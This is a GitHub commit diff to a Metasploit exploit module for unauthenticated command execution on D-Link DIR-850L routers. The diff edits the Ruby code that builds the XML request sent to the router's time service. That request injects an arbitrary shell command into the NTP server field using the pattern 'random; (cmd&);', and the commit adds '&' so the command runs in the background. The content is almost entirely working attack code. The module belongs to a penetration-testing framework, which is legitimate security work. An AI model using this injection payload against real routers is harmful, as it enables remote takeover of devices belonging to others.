Skip to content

Commit 32a75e9

Browse files
author
Austin
authored
Update dlink_850l_unauth_exec.rb
1 parent 705c1cc commit 32a75e9

File tree

1 file changed

+20
-20
lines changed

1 file changed

+20
-20
lines changed

modules/exploits/linux/http/dlink_850l_unauth_exec.rb

Lines changed: 20 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -121,26 +121,26 @@ def execute(cmd, username, password)
121121
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
122122
payload << "<postxml>\r\n"
123123
payload << "<module>\r\n"
124-
payload << " <service>DEVICE.TIME</service>\r\n"
125-
payload << " <device>\r\n"
126-
payload << " <time>\r\n"
127-
payload << " <ntp>\r\n"
128-
payload << " <enable>1</enable>\r\n"
129-
payload << " <period>604800</period>\r\n"
130-
payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}); </server>\r\n"
131-
payload << " </ntp>\r\n"
132-
payload << " <ntp6>\r\n"
133-
payload << " <enable>1</enable>\r\n"
134-
payload << " <period>604800</period>\r\n"
135-
payload << " </ntp6>\r\n"
136-
payload << " <timezone>20</timezone>\r\n"
137-
payload << " <time/>\r\n"
138-
payload << " <date/>\r\n"
139-
payload << " <dst>0</dst>\r\n"
140-
payload << " <dstmanual/>\r\n"
141-
payload << " <dstoffset/>\r\n"
142-
payload << " </time>\r\n"
143-
payload << " </device>\r\n"
124+
payload << " <service>DEVICE.TIME</service>\r\n"
125+
payload << " <device>\r\n"
126+
payload << " <time>\r\n"
127+
payload << " <ntp>\r\n"
128+
payload << " <enable>1</enable>\r\n"
129+
payload << " <period>604800</period>\r\n"
130+
payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
131+
payload << " </ntp>\r\n"
132+
payload << " <ntp6>\r\n"
133+
payload << " <enable>1</enable>\r\n"
134+
payload << " <period>604800</period>\r\n"
135+
payload << " </ntp6>\r\n"
136+
payload << " <timezone>20</timezone>\r\n"
137+
payload << " <time/>\r\n"
138+
payload << " <date/>\r\n"
139+
payload << " <dst>0</dst>\r\n"
140+
payload << " <dstmanual/>\r\n"
141+
payload << " <dstoffset/>\r\n"
142+
payload << " </time>\r\n"
143+
payload << " </device>\r\n"
144144
payload << "</module>\r\n"
145145
payload << "</postxml>"
146146
begin

0 commit comments

Comments
 (0)